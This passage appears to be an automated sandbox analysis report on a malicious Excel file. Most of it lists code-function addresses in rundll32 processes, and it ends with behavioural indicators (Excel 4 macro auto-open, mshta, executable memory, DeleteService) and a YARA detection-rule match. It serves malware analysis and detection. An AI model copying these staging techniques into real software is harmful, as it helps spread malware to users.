Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00750867 12_2_00750867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073E86A 12_2_0073E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0075146E 12_2_0075146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074026B 12_2_0074026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073C850 12_2_0073C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738650 12_2_00738650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073CA43 12_2_0073CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073E243 12_2_0073E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00745040 12_2_00745040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00732830 12_2_00732830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00741831 12_2_00741831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074363D 12_2_0074363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073B821 12_2_0073B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736C29 12_2_00736C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074542E 12_2_0074542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074A429 12_2_0074A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073B41A 12_2_0073B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074561F 12_2_0074561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736A1F 12_2_00736A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007464F1 12_2_007464F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007388F4 12_2_007388F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007344FA 12_2_007344FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074D8D7 12_2_0074D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736ED6 12_2_00736ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074ACD3 12_2_0074ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007504DE 12_2_007504DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007368DE 12_2_007368DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007404B8 12_2_007404B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074129C 12_2_0074129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AE9A 12_2_0073AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074109E 12_2_0074109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736083 12_2_00736083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074CC89 12_2_0074CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00748D71 12_2_00748D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073777B 12_2_0073777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AB66 12_2_0073AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074A156 12_2_0074A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00744B56 12_2_00744B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00731950 12_2_00731950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F154 12_2_0073F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00742753 12_2_00742753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00750D5B 12_2_00750D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740946 12_2_00740946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00743D41 12_2_00743D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073BB4B 12_2_0073BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073194C 12_2_0073194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074FF31 12_2_0074FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740D33 12_2_00740D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073472E 12_2_0073472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073911A 12_2_0073911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073C309 12_2_0073C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073BD0F 12_2_0073BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00742BF6 12_2_00742BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074EBFF 12_2_0074EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007445CD 12_2_007445CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074D3C8 12_2_0074D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073CFCE 12_2_0073CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00747BCA 12_2_00747BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00733FB8 12_2_00733FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00732FA1 12_2_00732FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007441A7 12_2_007441A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074C9A9 12_2_0074C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007499AA 12_2_007499AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00751993 12_2_00751993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00731F9B 12_2_00731F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00737B82 12_2_00737B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00749186 12_2_00749186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074C38F 12_2_0074C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F58F 12_2_0073F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073FD8C 12_2_0073FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10036007 13_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10041050 13_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003130F 13_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100323E2 13_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10030460 13_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10041592 13_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003E59F 13_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003960C 13_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100317E2 13_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10040B0E 13_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10031BB6 13_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10041C56 13_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10036CB5 13_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001CD16 13_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10042D21 13_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10031FC2 13_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00609700 13_2_00609700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00615CF9 13_2_00615CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00615040 13_2_00615040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006070ED 13_2_006070ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606083 13_2_00606083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061109E 13_2_0061109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060F154 13_2_0060F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061A156 13_2_0061A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060911A 13_2_0060911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006141A7 13_2_006141A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00619186 13_2_00619186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061026B 13_2_0061026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060E243 13_2_0060E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061129C 13_2_0061129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060C309 13_2_0060C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061D3C8 13_2_0061D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061C38F 13_2_0061C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061B391 13_2_0061B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0062146E 13_2_0062146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061A429 13_2_0061A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061542E 13_2_0061542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060B41A 13_2_0060B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006164F1 13_2_006164F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006044FA 13_2_006044FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006204DE 13_2_006204DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006174DD 13_2_006174DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006104B8 13_2_006104B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061E498 13_2_0061E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00613512 13_2_00613512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006145CD 13_2_006145CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060F58F 13_2_0060F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00623672 13_2_00623672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00608650 13_2_00608650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061363D 13_2_0061363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061561F 13_2_0061561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060777B 13_2_0060777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00612753 13_2_00612753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060472E 13_2_0060472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00620867 13_2_00620867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00616864 13_2_00616864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060E86A 13_2_0060E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060C850 13_2_0060C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060B821 13_2_0060B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00611831 13_2_00611831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00602830 13_2_00602830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006088F4 13_2_006088F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061D8D7 13_2_0061D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006068DE 13_2_006068DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00610946 13_2_00610946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060194C 13_2_0060194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00601950 13_2_00601950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060F93D 13_2_0060F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061C9A9 13_2_0061C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006199AA 13_2_006199AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00621993 13_2_00621993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00609A7D 13_2_00609A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060CA43 13_2_0060CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606A1F 13_2_00606A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060AB66 13_2_0060AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060BB4B 13_2_0060BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00621B54 13_2_00621B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00614B56 13_2_00614B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00612BF6 13_2_00612BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061EBFF 13_2_0061EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00617BCA 13_2_00617BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00607B82 13_2_00607B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606C29 13_2_00606C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061ACD3 13_2_0061ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061CC89 13_2_0061CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060EC9B 13_2_0060EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00618D71 13_2_00618D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00613D41 13_2_00613D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00620D5B 13_2_00620D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00610D33 13_2_00610D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060BD0F 13_2_0060BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060FD8C 13_2_0060FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00608D95 13_2_00608D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606ED6 13_2_00606ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061BE8C 13_2_0061BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061EE94 13_2_0061EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060AE9A 13_2_0060AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061FF31 13_2_0061FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060CFCE 13_2_0060CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00602FA1 13_2_00602FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00603FB8 13_2_00603FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00601F9B 13_2_00601F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A04B8 14_2_002A04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002ABE8C 14_2_002ABE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029EC9B 14_2_0029EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AE498 14_2_002AE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AEE94 14_2_002AEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002970ED 14_2_002970ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A5CF9 14_2_002A5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A74DD 14_2_002A74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029F93D 14_2_0029F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00299700 14_2_00299700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A3512 14_2_002A3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B1B54 14_2_002B1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AB391 14_2_002AB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00298D95 14_2_00298D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296C29 14_2_00296C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AA429 14_2_002AA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A542E 14_2_002A542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029B821 14_2_0029B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A363D 14_2_002A363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00292830 14_2_00292830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A1831 14_2_002A1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029B41A 14_2_0029B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A561F 14_2_002A561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296A1F 14_2_00296A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A026B 14_2_002A026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029E86A 14_2_0029E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B146E 14_2_002B146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B0867 14_2_002B0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A6864 14_2_002A6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00299A7D 14_2_00299A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B3672 14_2_002B3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029CA43 14_2_0029CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A5040 14_2_002A5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029E243 14_2_0029E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029C850 14_2_0029C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00298650 14_2_00298650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002ACC89 14_2_002ACC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296083 14_2_00296083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029AE9A 14_2_0029AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A109E 14_2_002A109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A129C 14_2_002A129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002944FA 14_2_002944FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A64F1 14_2_002A64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002988F4 14_2_002988F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B04DE 14_2_002B04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002968DE 14_2_002968DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AACD3 14_2_002AACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AD8D7 14_2_002AD8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296ED6 14_2_00296ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029472E 14_2_0029472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A0D33 14_2_002A0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AFF31 14_2_002AFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029C309 14_2_0029C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029BD0F 14_2_0029BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029911A 14_2_0029911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029AB66 14_2_0029AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029777B 14_2_0029777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A8D71 14_2_002A8D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029BB4B 14_2_0029BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029194C 14_2_0029194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A3D41 14_2_002A3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A0946 14_2_002A0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B0D5B 14_2_002B0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00291950 14_2_00291950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A2753 14_2_002A2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AA156 14_2_002AA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A4B56 14_2_002A4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029F154 14_2_0029F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A99AA 14_2_002A99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AC9A9 14_2_002AC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00292FA1 14_2_00292FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A41A7 14_2_002A41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00293FB8 14_2_00293FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AC38F 14_2_002AC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029FD8C 14_2_0029FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029F58F 14_2_0029F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00297B82 14_2_00297B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A9186 14_2_002A9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00291F9B 14_2_00291F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B1993 14_2_002B1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AEBFF 14_2_002AEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A2BF6 14_2_002A2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A7BCA 14_2_002A7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AD3C8 14_2_002AD3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A45CD 14_2_002A45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029CFCE 14_2_0029CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00285CF9 16_2_00285CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00279700 16_2_00279700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028A429 16_2_0028A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028542E 16_2_0028542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027B821 16_2_0027B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00276C29 16_2_00276C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028363D 16_2_0028363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00272830 16_2_00272830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00281831 16_2_00281831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028561F 16_2_0028561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00276A1F 16_2_00276A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027B41A 16_2_0027B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028026B 16_2_0028026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0029146E 16_2_0029146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00286864 16_2_00286864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027E86A 16_2_0027E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00290867 16_2_00290867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00279A7D 16_2_00279A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00293672 16_2_00293672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027CA43 16_2_0027CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027E243 16_2_0027E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00285040 16_2_00285040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027C850 16_2_0027C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00278650 16_2_00278650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002804B8 16_2_002804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028CC89 16_2_0028CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00276083 16_2_00276083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028BE8C 16_2_0028BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028E498 16_2_0028E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028129C 16_2_0028129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028109E 16_2_0028109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027EC9B 16_2_0027EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028EE94 16_2_0028EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027AE9A 16_2_0027AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002770ED 16_2_002770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002788F4 16_2_002788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002864F1 16_2_002864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002744FA 16_2_002744FA
Source: 36E8.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: DOCUMENT_2801.xls Macro extractor: Sheet name: Macro3
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029C67D DeleteService, 14_2_0029C67D
Source: DOCUMENT_2801.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hzcvqvi\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
